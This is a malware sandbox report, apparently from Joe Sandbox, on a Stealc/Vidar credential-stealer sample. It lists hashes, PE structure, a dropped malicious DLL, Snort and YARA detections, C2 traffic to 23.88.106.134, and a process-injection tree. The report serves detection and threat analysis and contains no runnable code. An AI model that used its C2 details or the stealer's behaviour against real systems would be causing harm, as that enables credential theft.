                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                        Malicious:false
                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\d3d9.dll

                        Download File
                        Process:C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):272896
                        Entropy (8bit):6.785813762497204
                        Encrypted:false
                        SSDEEP:6144:XYaqOCMQK9syh0bxdWPhT917U4ji8U7kV:oaqOCMRyx2/fjn
                        MD5:A16BFDD7C9F753A43F3EAA5522BA9D9D
                        SHA1:36381482314AB4845531E4875C1FE520B50D1FE4
                        SHA-256:E0B2AA87DAFB8977C806C5BFADA424E7DAE2E41995B8974D72EE455513262EA5
                        SHA-512:FC700EF5A63F3CA9141991F9AEA64F1B5958C6895C27B1763791736219C0CDD8D033B9D4D7F9A4D435AB86A14C5EC4A12F69298BD7A9EE6FADE9EE98EFB1B846
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 79%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.)...GQ..GQ..GQL.DP..GQL.BP..GQL.CP..GQL.FP..GQ z<Q..GQ..FQe.GQ.=BP..GQ.=CP..GQ.=DP..GQ..GQ..GQj=GP..GQj=EP..GQRich..GQ........................PE..L.....bf...........!...&.N..........~........`...............................`............@.............................T...T...<............................@...... ...............................`...@............`..P............................text....M.......N.................. ..`.rdata...c...`...d...R..............@..@.data...\i.......`..................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):6.415848356186701
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        • Win32 Executable (generic) a (10002005/4) 49.96%
                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        File size:474'624 bytes
                        MD5:9c2b900d014ba5b9dfd0ca6cef201753
                        SHA1:e5705841f68d9443ba5efb553aa9f87556e403e5
                        SHA256:f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf317fab7b3e90281b5d05
                        SHA512:5f92c1cff9312b100feca38c4ad8aa82af351d9ca01c420ed44f154fe8c1e3c9027fcffcf9578748601bc29708e8df0969bd4cdc1732a819fb37006a769b13d4
                        SSDEEP:12288:4seLUscjnY6sJnCWH4UbmCJbbdKofwk/TsyVhpceSvbCq66imuXd6cWD/pWc0GMX:47U17
                        TLSH:3FA4A89D766076DFC85BD0729AA81DB8FB5078BB431F4243902716ADAE5C89BCF140F2
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bf.................j................... ....@.. ....................................@................................

                        File Icon

                        Icon Hash:90cececece8e8eb0

                        Static PE Info

                        General

                        Entrypoint:0x47c00a
                        Entrypoint Section:
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows cui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x6662E9C7 [Fri Jun 7 11:06:47 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Entrypoint Preview

                        Instruction
                        jmp dword ptr [0047C000h]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x307fc0x4f.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x780000x6d8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000xc.reloc
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x7c0000x8
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x300000x48.text
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        A7B&<U0x20000x2c5940x2c60002cd036eb91bd81e0b36971c82bf1b45False0.9998899647887324data7.998974089724877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .text0x300000x467300x46800ec30b4931571fd884bfe8bc644b5b4ebFalse0.3267848238031915data4.520642074921792IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rsrc0x780000x6d80x800468273f60eaf63ae5528e7b5d667ae35False0.36279296875data3.7387498824008096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .reloc0x7a0000xc0x200e81a80c38992ec6b3b4d5dcfcfc5314aFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                        0x7c0000x100x2007ca58d1a0a472541553b5df07f5e79fdFalse0.044921875Applesoft BASIC program data, first line number 30.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_VERSION0x780a00x44cdata0.4
                        RT_MANIFEST0x784ec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                        Imports

                        DLLImport
                        mscoree.dll_CorExeMain

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        06/08/24-20:21:59.805841TCP2051828ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1804973123.88.106.134192.168.2.4
                        06/08/24-20:21:59.555146TCP2044244ET TROJAN Win32/Stealc Requesting browsers Config from C24973180192.168.2.423.88.106.134
                        06/08/24-20:22:00.160152TCP2051831ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1804973123.88.106.134192.168.2.4
                        06/08/24-20:21:58.692257TCP2044243ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in4973180192.168.2.423.88.106.134
                        06/08/24-20:21:59.902142TCP2044246ET TROJAN Win32/Stealc Requesting plugins Config from C24973180192.168.2.423.88.106.134

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jun 8, 2024 20:21:58.686938047 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:21:58.691910028 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:21:58.691996098 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:21:58.692256927 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:21:58.697139025 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:21:59.553096056 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:21:59.553186893 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:21:59.555145979 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:21:59.561285019 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:21:59.805840969 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:21:59.805902958 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:21:59.806415081 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:21:59.902142048 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:21:59.912898064 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.160151958 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.160202980 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.160242081 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.160276890 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.160315990 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.160330057 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.160387993 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.160387993 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.160410881 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.211610079 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.211685896 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.220216990 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.220278025 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.220308065 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.220340967 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.224417925 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.224447012 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.228542089 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.496449947 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.496597052 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.740082979 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.749938011 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995032072 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995050907 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995066881 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995081902 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995100021 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995114088 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995323896 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.995325089 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.995374918 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995392084 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995408058 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995444059 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.995460987 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995470047 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.995480061 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995490074 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995628119 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995642900 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:00.995645046 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:00.995704889 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.118257046 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.118359089 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.118387938 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.118426085 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.118443012 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.118459940 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.118495941 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.118521929 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.118522882 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.118549109 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.118561029 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.118602037 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.118602991 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.118638992 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.118671894 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.118714094 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.118714094 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.118833065 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.119492054 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.119525909 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.119563103 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.119563103 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.119586945 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.119596958 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.119618893 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.119637966 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.119663954 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.119712114 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.120668888 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.120703936 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.120739937 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.120748997 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.120771885 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.120779991 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.120795012 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.120815992 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.120855093 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.120884895 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.121778011 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.121855974 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.121931076 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.121964931 CEST804973123.88.106.134192.168.2.4
                        Jun 8, 2024 20:22:01.121995926 CEST4973180192.168.2.423.88.106.134
                        Jun 8, 2024 20:22:01.122000933 CEST804973123.88.106.134192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jun 8, 2024 20:22:19.646400928 CEST53651471.1.1.1192.168.2.4

                        HTTP Request Dependency Graph

                        • 23.88.106.134

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:14:21:57
                        Start date:08/06/2024
                        Path:C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe"
                        Imagebase:0x750000
                        File size:474'624 bytes
                        MD5 hash:9C2B900D014BA5B9DFD0CA6CEF201753
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:1
                        Start time:14:21:57
                        Start date:08/06/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:14:21:57
                        Start date:08/06/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                        Imagebase:0x10000
                        File size:43'016 bytes
                        MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:true

                        Disassembly

                        No disassembly